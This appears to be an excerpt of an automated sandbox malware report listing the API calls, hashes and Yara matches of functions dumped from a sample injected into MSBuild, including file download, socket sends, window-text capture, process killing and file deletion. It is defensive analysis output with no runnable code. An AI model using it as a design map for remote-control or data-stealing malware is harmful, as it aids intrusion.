                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004157A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DownloadFileSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1931167962-0
                                                                                                                        • Opcode ID: f0d74c9974317fc6269dedc451d9e10ff7ba908a7b2bc5488c8a7cbda813a619
                                                                                                                        • Instruction ID: 2166b22bc077c02c1b93db8cb301ccfdac2f33cb5c0e2722be81623e7165673a
                                                                                                                        • Opcode Fuzzy Hash: f0d74c9974317fc6269dedc451d9e10ff7ba908a7b2bc5488c8a7cbda813a619
                                                                                                                        • Instruction Fuzzy Hash: A81198315043019BC614FB72DC969FE73A9EF90318F00497FF846A31E2EE389949C69A
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0044B9DF
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1482568997-0
                                                                                                                        • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                        • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                        • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                        • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                        APIs
                                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1953588214-0
                                                                                                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                          • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3476068407-0
                                                                                                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                        • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                        • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 29597999-0
                                                                                                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                        • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                        • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                        APIs
                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1170566393-0
                                                                                                                        • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                        • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                                        • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                        • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$CloseStop
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3638528417-0
                                                                                                                        • Opcode ID: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                        • Instruction ID: f291f111d3b55938ba5bd66d5a3b5313f014998fb7faa1113fe40cd21bfd9f38
                                                                                                                        • Opcode Fuzzy Hash: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                        • Instruction Fuzzy Hash: E6E04F321181408AC314EB69F855AED77A1EB91305F01447EE40D824B2EB355589EB6A
                                                                                                                        APIs
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 00414F49
                                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 8db13b7f98342a5fd383609f648f4d13f07d60eadb5b6f450f9b70bcb90dc376
                                                                                                                        • Instruction ID: 16af9778d2dab026e44fd182aff3595c44448f688ab1221e4f47f4f5b7710ba8
                                                                                                                        • Opcode Fuzzy Hash: 8db13b7f98342a5fd383609f648f4d13f07d60eadb5b6f450f9b70bcb90dc376
                                                                                                                        • Instruction Fuzzy Hash: AE01043160430086C614FB72D496AEE73E19FD4718F40497FF846A75E2EF38A949C79A
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 00415027
                                                                                                                          • Part of subcall function 0040E6A3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                          • Part of subcall function 0040E6A3: Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                          • Part of subcall function 0040E6A3: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CreateCurrentFirstNextProcessSnapshotToolhelp32send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 199960123-0
                                                                                                                        • Opcode ID: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                        • Instruction ID: 38e1ea502710b120ae7c3f9edb738cb9f03b37d5bda28388bee33bdc26f80029
                                                                                                                        • Opcode Fuzzy Hash: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                        • Instruction Fuzzy Hash: B90144726082004BC214F675E896AAEB3E4EBD0304F50483FF945931D1EF789949869A
                                                                                                                        APIs
                                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 004151AA
                                                                                                                          • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumTextWindowWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2480600497-0
                                                                                                                        • Opcode ID: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                        • Instruction ID: a8c1eb5ea3412325c7836402fc4d3de0a1ddbf8df3531501c40fc1e27f2746ac
                                                                                                                        • Opcode Fuzzy Hash: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                        • Instruction Fuzzy Hash: C4F012315043419AC614FB72D856AFE73A59F90314F40883FB846A60E2EF789949C69A
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                        • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                        • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                        • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                        APIs
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00415164
                                                                                                                          • Part of subcall function 0041AD19: OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,0041509E,00000000), ref: 0041AD21
                                                                                                                          • Part of subcall function 0041AD19: TerminateProcess.KERNEL32(00000000,00000000,?,?,0041509E,00000000), ref: 0041AD2F
                                                                                                                          • Part of subcall function 0041AD19: CloseHandle.KERNEL32(00000000,?,?,0041509E,00000000), ref: 0041AD3B
                                                                                                                          • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseEnumHandleOpenTerminateThreadWindowWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2526979043-0
                                                                                                                        • Opcode ID: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                        • Instruction ID: b05455b57e7b0bef87b9695cb18fe303039b29ce9b6afb21aeb883f1c56ff91e
                                                                                                                        • Opcode Fuzzy Hash: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                        • Instruction Fuzzy Hash: DFF0373114434096C514FBB2D856AFE73A9EF90314F10493FF945930E2DF389955C65A
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                        • Instruction ID: 478be8ff441214b3a5c9b97e177def518a8b57326db61f46b7c8e0227de354c4
                                                                                                                        • Opcode Fuzzy Hash: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                        • Instruction Fuzzy Hash: 45E0923114830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                        • Instruction ID: 0034518ddbccc6a27852650da3faa1cedc62a7c2b8847e5fdedca3bed852e860
                                                                                                                        • Opcode Fuzzy Hash: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                        • Instruction Fuzzy Hash: 55E0923124830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                        • Instruction ID: 0be16cab6edacd20e9e571eebac107012cf7170144a05da788fd32dfe1696584
                                                                                                                        • Opcode Fuzzy Hash: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                        • Instruction Fuzzy Hash: E7E0923114830096C114FB71EC56BFE73A4AF90714F40483FF80A970E2EF789889C69A
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                        • Instruction ID: 6925553bea9c14164719a3d84184eb848672d29ec3025f6f87dd104ec2ec7084
                                                                                                                        • Opcode Fuzzy Hash: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                        • Instruction Fuzzy Hash: BAE0483114434096C514FB71E856BFE73A4EF90314F40483FF84A974E2EF789549C699
                                                                                                                        APIs
                                                                                                                        • CloseWindow.USER32(00000000), ref: 00415107
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2868366576-0
                                                                                                                        • Opcode ID: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                        • Instruction ID: 51d836d651f70c7de7d7e96136ec3ff7ad66d234ad1b9695958841da982dd75b
                                                                                                                        • Opcode Fuzzy Hash: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                        • Instruction Fuzzy Hash: 45E04F3110824086C614FBB2EC56AFE73A4EF90315F40483FF84A970E2EF389949C69A
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000), ref: 00415715
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                        • Instruction ID: f382e6b5168fe8f350e331b78b3d6dca2a18559efdd8391db893a32af1609f21
                                                                                                                        • Opcode Fuzzy Hash: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                        • Instruction Fuzzy Hash: DDE0E63111824186C614FB71E856BFE73A5EFD0315F40487FF84A974E2EF389949C69A
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Startup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 724789610-0
                                                                                                                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809346765-0
                                                                                                                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Deallocate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1075933841-0
                                                                                                                        • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                        • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                        • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                        • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                          • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                          • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                          • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
